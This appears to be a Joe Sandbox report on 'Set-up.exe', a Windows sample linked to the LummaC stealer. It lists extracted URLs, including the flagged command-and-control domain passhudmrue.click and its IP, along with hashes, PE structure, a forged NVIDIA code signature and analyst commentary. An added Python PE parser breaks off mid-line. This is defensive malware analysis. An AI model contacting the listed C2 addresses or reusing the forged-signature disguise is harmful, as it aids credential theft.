https://duckduckgo.com/chrome_newtab | 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.redtube.com/videohttps://www.thumbzilla.com/Thumbzillathumbzilla.comthumbzilla. | 'Set-up.exe | false | | high
http://crl.microsoft | 'Set-up.exe, 00000000.00000003.2430771880.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2289335741.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419550458.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000002.2458966002.0000000000985000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2457690210.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419435129.000000000092C000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2434892748.0000000000947000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2457833420.0000000000983000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.txxx.tube/Txxxtxxx.comtxxx.tubehttps://txxx.com/api/videofile.php?video_id=%s&lifetime=% | 'Set-up.exe | false | Avira URL Cloud: safe | unknown
https://hotmovs.comhttps://www.hqporner.com/hqpornerhqporner.com | 'Set-up.exe | false | Avira URL Cloud: safe | unknown
https://passhudmrue.click:443/api | 'Set-up.exe, 00000000.00000003.2439840197.00000000009A1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.yahoo.com/Yahoo | 'Set-up.exe | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.youtube.com/%I64d-%I64d-%I64d0-%I64dContent-Type: | 'Set-up.exe | false | | high
https://www.youtube.com/watch?v=Zk9J5xnTVMAZk9J5xnTVMAPlease | 'Set-up.exe | false | | high
http://www.fuxiangliu.com/services%s/youtube.com-sig.js//s.ytimg.com//www.youtube.comvar | 'Set-up.exe | false | Avira URL Cloud: safe | unknown
http://ocsp.starfieldtech.com/0D | 'Set-up.exe | false | | high
https://www.txxx.com/ | 'Set-up.exe | false | | high
https://passhudmrue.click/rx | 'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.handjobhub.com/HandjobHubhandjobhub.comhandjobhub.cdn.handjobhub.comsrc= | 'Set-up.exe | false | Avira URL Cloud: safe | unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0 | 'Set-up.exe | false | | high
http://x1.c.lencr.org/0 | 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.eporner.com/EPORNEReporner.comeporner.cdn.eporner.comhttps://www.eporner.com/video-%s//& | 'Set-up.exe | false | | high
https://vivporn.com/wp-content/plugins/ | 'Set-up.exe | false | Avira URL Cloud: safe | unknown
https://passhudmrue.click/t | 'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://passhudmrue.click/api?l/h | 'Set-up.exe, 00000000.00000003.2434892748.0000000000947000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://passhudmrue.click/api9T) | 'Set-up.exe, 00000000.00000003.2434822982.0000000003749000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2457889124.000000000374B000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2439659352.0000000003749000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000002.2459592358.000000000374D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://passhudmrue.click/apis | 'Set-up.exe, 00000000.00000003.2419112504.0000000003749000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419283872.000000000374B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.starfieldtech.com/repository/sfsroot.crl0P | 'Set-up.exe | false | | high
https://www.tomabo.com/mp4-player/download.html | 'Set-up.exe | false | Avira URL Cloud: safe | unknown
https://support.mozilla.org/products/firefoxgro.all | 'Set-up.exe, 00000000.00000003.2388465216.0000000003855000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.hotmovs.tube/hotmovs.comhotmovs.tubeis_defaultvideo_urlhttps://hotmovs.com/api/videofile | 'Set-up.exe | false | Avira URL Cloud: safe | unknown
https://www.mozilla.or | 'Set-up.exe, 00000000.00000003.2388398991.000000000377D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn-fck.tnaflix.com/tnaflix/%s.fid?key=%s&VID=%s&nomp4=1&catID=0&rollover=1&startThumb=%s&em | 'Set-up.exe | false | Avira URL Cloud: safe | unknown
https://passhudmrue.click/c | 'Set-up.exe, 00000000.00000003.2289335741.0000000000946000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.tomabo.com/mp4-player/purchase.htmlhttps://www.tomabo.com/mp4-playerhttps://www.tomabo.c | 'Set-up.exe | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://passhudmrue.click/e | 'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.thawte.com0 | 'Set-up.exe | false | | high
https://passhudmrue.click/apiQ. | 'Set-up.exe, 00000000.00000003.2301498819.000000000374D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.youtube.com/playlist?list=%shttps://i.ytimg.com/vi/%s/maxresdefault.jpghttps://i.ytimg.c | 'Set-up.exe | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://passhudmrue.click/ | 'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419435129.000000000092C000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419615846.000000000092E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0 | 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://passhudmrue.click/R | 'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.rootca1.amazontrust.com0: | 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://certificates.starfieldtech.com/repository/1604 | 'Set-up.exe | false | | high
https://www.ecosia.org/newtab/ | 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.youtube.com/youtubei/v1/player?key=%s&prettyPrint=falseOriginX-Youtube-Client-VersionX-Y | 'Set-up.exe | false |
                                                                                      high
                                                                                      http://www.symauth.com/cps0('Set-up.exefalse
                                                                                        high
                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br'Set-up.exe, 00000000.00000003.2388465216.0000000003855000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.hotmovs.com/'Set-up.exefalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://passhudmrue.click/N'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://ac.ecosia.org/autocomplete?q='Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.youtube.com/watch?v=%s&gl=US&hl=en&has_verified=1&bpctr=9999999999lengthSecondshlsManife'Set-up.exefalse
                                                                                              high
                                                                                              http://crl.starfieldtech.com/repository/0'Set-up.exefalse
                                                                                                high
                                                                                                https://passhudmrue.click/44'Set-up.exe, 00000000.00000003.2301552831.0000000003756000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2301601874.0000000003759000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://www.tomabo.com/videos/dog-and-balls.mp4Please'Set-up.exefalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://www.tomabo.comVersion'Set-up.exefalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://passhudmrue.click/E'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://www.tnaflix.com/Tnaflixtnaflix.comtnaflix.'Set-up.exefalse
                                                                                                    high
                                                                                                    http://www.symauth.com/rpa00'Set-up.exefalse
                                                                                                      high
                                                                                                      https://passhudmrue.click/apihF)'Set-up.exe, 00000000.00000003.2399629443.0000000003748000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2399646232.000000000374B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.redtube.com/RedTuberedtube.comredtube.https://www.redtube.com/%sid=/player/?id=?id='Set-up.exefalse
                                                                                                          high
                                                                                                          https://passhudmrue.click/apiNp'Set-up.exe, 00000000.00000003.2289335741.0000000000946000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q='Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.google.com/Google'Set-up.exefalse
                                                                                                              high
                                                                                                              https://www.eporner.com/xhr/video/%s?hash=%s&device=generic&domain=www.eporner.com&fallback=falsevar'Set-up.exefalse
                                                                                                                high
                                                                                                                https://api.github.com/repos/ytdl-org/ytdl-nightly/releases/latestMX_ytdlbrowser_download_urlyoutube'Set-up.exefalse
                                                                                                                  high
                                                                                                                  https://passhudmrue.click/0'Set-up.exe, 00000000.00000003.2387217571.0000000003754000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2387007822.0000000003748000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2387037149.0000000003753000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://www.youtube.com/youtubei/v1/browse?key=%s&prettyPrint=falseX-Goog-Visitor-Idcontinuationclic'Set-up.exefalse
                                                                                                                    high
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.178.174 | passhudmrue.click | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1584523
Start date and time: 2025-01-05 18:52:23 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 38s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 'Set-up.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target 'Set-up.exe, PID 3940 because there are no executed functions
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
12:53:28 | API Interceptor | 9x Sleep call for process: 'Set-up.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
172.67.178.174 | E-dekont.exe | Get hash | malicious | GuLoader | Browse | -
No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | setup.exe | Get hash | malicious | LummaC | Browse | 172.67.163.221
CLOUDFLARENETUS | 'Set-up.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
CLOUDFLARENETUS | setup.msi | Get hash | malicious | Unknown | Browse | 104.21.32.1
CLOUDFLARENETUS | Set-up.exe | Get hash | malicious | LummaC | Browse | 104.21.21.63
CLOUDFLARENETUS | SET_UP.exe | Get hash | malicious | LummaC | Browse | 188.114.96.3
CLOUDFLARENETUS | Setup.exe | Get hash | malicious | LummaC | Browse | 172.67.208.58
CLOUDFLARENETUS | Setup.exe | Get hash | malicious | LummaC | Browse | 104.21.90.109
CLOUDFLARENETUS | Full_Setup.exe | Get hash | malicious | LummaC | Browse | 172.67.196.191
CLOUDFLARENETUS | momo.spc.elf | Get hash | malicious | Mirai | Browse | 1.1.1.1
CLOUDFLARENETUS | momo.ppc.elf | Get hash | malicious | Mirai | Browse | 1.1.1.1
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
a0e9f5d64349fb13191bc781f81f42e1 | setup.exe | Get hash | malicious | LummaC | Browse | 172.67.178.174
a0e9f5d64349fb13191bc781f81f42e1 | 'Set-up.exe | Get hash | malicious | LummaC | Browse | 172.67.178.174
a0e9f5d64349fb13191bc781f81f42e1 | Set-up.exe | Get hash | malicious | LummaC | Browse | 172.67.178.174
a0e9f5d64349fb13191bc781f81f42e1 | SET_UP.exe | Get hash | malicious | LummaC | Browse | 172.67.178.174
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe | Get hash | malicious | LummaC | Browse | 172.67.178.174
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe | Get hash | malicious | LummaC | Browse | 172.67.178.174
a0e9f5d64349fb13191bc781f81f42e1 | Full_Setup.exe | Get hash | malicious | LummaC | Browse | 172.67.178.174
a0e9f5d64349fb13191bc781f81f42e1 | K27Yg4V48M.exe | Get hash | malicious | LummaC | Browse | 172.67.178.174
a0e9f5d64349fb13191bc781f81f42e1 | IH5XqCdf06.exe | Get hash | malicious | LummaC | Browse | 172.67.178.174
a0e9f5d64349fb13191bc781f81f42e1 | 3jL3mqtjCn.exe | Get hash | malicious | LummaC | Browse | 172.67.178.174
No context
                                                                                                                      No created / dropped files found
                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):0.7001271014505994
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                                                                      • InstallShield setup (43055/19) 0.43%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:'Set-up.exe
                                                                                                                      File size:76'577'172 bytes
                                                                                                                      MD5:762266932c784bb2723293ad1cbecc37
                                                                                                                      SHA1:7983d7eda278567ba082c13b5690266212c447d4
                                                                                                                      SHA256:792474b38315e55d49a76f68e97b8a6b498ca794decc326cbaef5df22476c88d
                                                                                                                      SHA512:6862c10dbad70c356be44001f5f514a3f55b23e64aa4a2b89c6e49f1375bb83977bf8bf2398f4eb3f92fc0526968e9ff2e5021cff72725fcafef4351277838a3
                                                                                                                      SSDEEP:24576:iy3UVrqlCZuTti0JGBtlfvrVTPOk338FNR8olu6jF/3UDIBsS14tB1lzFlE675+E:L3UdqO4+OnXPPpBs1qg5lRCTk6A
                                                                                                                      TLSH:C7F77C1CFE0381F2C722F77089269EEDA9E45CC49F9287E7950939FA75225C74232939
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L>.."m.."m.."m.."m.."m...m.."m..)m.."m..(m.."mg.}m.."mj.,m.."m..#my."mj..m.."m..(m.."m..$m.."m..)mB."mRich.."m........PE..L..
                                                                                                                      Icon Hash:4dd933f06831b24d
                                                                                                                      Entrypoint:0x4ef5dc
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:true
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp: 0x676BB07E [Wed Dec 25 07:13:02 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: ff67bf11cc36c35722df0b7f1c459325
Signature Valid: false
Signature Issuer: CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232 (HRESULT 0x80096010, TRUST_E_BAD_DIGEST)
Not Before: 27/07/2015 20:00:00
Not After: 26/07/2018 19:59:59
Subject: CN=NVIDIA Corporation, O=NVIDIA Corporation, L=SANTA CLARA, S=California, C=US
Version: 3
Thumbprint MD5: F7219078FBE20BC1B98BF8A86BFC0396
Thumbprint SHA-1: 30632EA310114105969D0BDA28FDCE267104754F
Thumbprint SHA-256: 1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2
Serial: 14781BC862E8DC503A559346F5DCC518

Note on the signature: TRUST_E_BAD_DIGEST means the hash carried inside the signed blob does not match a hash of this file's headers and sections, i.e. the signature was produced over a different file body than the one it is now attached to. Taken together with a subject certificate issued to NVIDIA Corporation that expired in July 2018 and a PE time stamp of December 2024, the embedded certificate says nothing about who built this executable; the NVIDIA name in the signature metadata is not a reason to allow it.
Instruction (entry-point preview)
push ebp
mov ebp, esp
push FFFFFFFFh
push 0058B0F8h
push 004F5DC0h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 58h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
call dword ptr [00575374h]
xor edx, edx
mov dl, ah
mov dword ptr [0064A114h], edx
mov ecx, eax
and ecx, 000000FFh
mov dword ptr [0064A110h], ecx
shl ecx, 08h
add ecx, edx
mov dword ptr [0064A10Ch], ecx
shr eax, 10h
mov dword ptr [0064A108h], eax
push 00000001h
call 00007F5F5D9AA0D6h
pop ecx
test eax, eax
jne 00007F5F5D9A39BAh
push 0000001Ch
call 00007F5F5D9A3A77h
pop ecx
call 00007F5F5D9A9DE1h
test eax, eax
jne 00007F5F5D9A39BAh
push 00000010h
call 00007F5F5D9A3A66h
pop ecx
xor esi, esi
mov dword ptr [ebp-04h], esi
call 00007F5F5D9A9C0Fh
call 00007F5F5D9A9B69h
mov dword ptr [0064DA54h], eax
call 00007F5F5D9A99F2h
mov dword ptr [0064A0F4h], eax
call 00007F5F5D9A97BFh
call 00007F5F5D9A9702h
call 00007F5F5D9A424Eh
mov dword ptr [ebp-30h], esi
lea eax, dword ptr [ebp-5Ch]
push eax
call dword ptr [005752DCh]
call 00007F5F5D9A96A6h
mov dword ptr [ebp-64h], eax
test byte ptr [ebp-30h], 00000001h
je 00007F5F5D9A39B8h
movzx eax, word ptr [ebp-2Ch]

Reading of the stub: this is the Visual C++ 6 CRT startup sequence, not sample-specific logic. It installs an SEH frame (the two pushed constants are the scope table and the handler), then calls through the IAT slot at [00575374h] and splits the result exactly as the CRT splits GetVersion: low byte to [0064A110h] (major), second byte to [0064A114h] (minor), major<<8 | minor to [0064A10Ch], high word (build number) to [0064A108h]. The two push/call/test/jne groups are the heap and I/O initialisers with their error exits (codes 1Ch and 10h). The lea eax, [ebp-5Ch] handed to the IAT slot at [005752DCh] is a 0x44-byte STARTUPINFO: test byte ptr [ebp-30h], 1 checks dwFlags (offset 0x2C) for STARTF_USESHOWWINDOW and movzx eax, word ptr [ebp-2Ch] reads wShowWindow (offset 0x30). Both IAT addresses sit 0x400000 above the IAT directory's RVA range (0x175000-0x175848), consistent with the default image base. The call targets printed as 00007F5F5D9A....h are analyser-relative addresses, not RVAs in the file. The program's own code is reached only after this prologue, so a detection keyed on these bytes would match any VC6-linked executable.
Programming Language:
• [ C ] VS98 (6.0) SP6 build 8804
• [EXP] VC++ 6.0 SP5 build 8804
• [C++] VS98 (6.0) SP6 build 8804
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x1acec0        | 0x12c        | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x24f000        | 0xa4000      | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x4903fd4       | 0x39c0       |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x175000        | 0x848        | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |

Two things to read off this table. The SECURITY entry's "Virtual Address" is a raw file offset, not an RVA (the certificate table is never mapped into memory), which is why it falls in no section; at 0x4903fd4 plus 0x39c0 bytes it also places the end of the file at roughly 73 MiB, while the four sections below total about 2.9 MiB of raw data, so some 70 MiB of the file is overlay described by no section header. An empty BASERELOC directory means the image carries no relocations and must load at its preferred base, which matches the absolute addresses in the entry-point listing above.
Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity    | File Type | Entropy            | Characteristics
.text  | 0x1000          | 0x173bd8     | 0x174000 | c485b2605da69b4c1f096257f771d3b4 | False    | 0.5095871135752689 | data      | 6.682177361970691  | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x175000        | 0x3ac1e      | 0x3b000  | 7d90b567ca926b4c16bc3e8e715834a3 | False    | 0.2986005362817797 | data      | 4.777250629842978  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data  | 0x1b0000        | 0x9e588      | 0x98000  | aa8a391fe0255a3eff2beea09b53776e | False    | 0.108978271484375  | data      | 1.9379617641950813 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc  | 0x24f000        | 0xa4000      | 0xa4000  | 47ac5187b878b23c2c6d4c8497a512ef | False    | 0.39373779296875   | data      | 6.269065678971354  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

No section is both writable and executable, and no section's entropy approaches the 7.5+ typical of packed or encrypted images; 6.68 for .text is ordinary compiled code, so whatever obfuscation the sample uses is applied below the level of whole-image packing and the section MD5s above are hashes of the real code. The .data virtual size exceeding its raw size (0x9e588 vs 0x98000) is uninitialised data and is normal.
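The section and data-directory values above come straight out of the PE headers, and the signature block's TRUST_E_BAD_DIGEST is a mismatch against a hash computed over those same headers and sections. The following Python is an added example written for this page, not code from the Joe Sandbox report or from the sample: it walks a PE32 with only the standard library, reproduces the Virtual Address, Raw Size, MD5 and Entropy columns and the "Is in Section" lookup, and computes the Authenticode file digest the way the specification lays it out (CheckSum and the SECURITY directory entry skipped, sections in file order, certificate table excluded). The file it parses is a two-section PE built inline as constructed sample data; the directory names, field offsets and WIN_CERTIFICATE layout are standard PE32, and the PE32+ (64-bit) variant is rejected rather than handled.

```python
import hashlib
import math
import struct
from collections import Counter

# Slot order of IMAGE_DIRECTORY_ENTRY_* in the optional header.
DIRECTORY_NAMES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
                   "DEBUG", "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT",
                   "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]

def shannon_entropy(blob: bytes) -> float:
    """Bits per byte (0.0..8.0): the 'Entropy' column of the section table."""
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in Counter(blob).values()) if n else 0.0

def parse_pe32(data: bytes) -> dict:
    """DOS header -> NT signature -> COFF -> optional header -> directories -> sections (PE32 only)."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 handled here; PE32+ shifts the optional-header offsets")
    size_of_headers = struct.unpack_from("<I", data, opt + 60)[0]
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    dir_base = opt + 96
    dirs = {DIRECTORY_NAMES[i]: struct.unpack_from("<II", data, dir_base + 8 * i)
            for i in range(min(ndirs, 16))}
    sections = []
    for i in range(nsec):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
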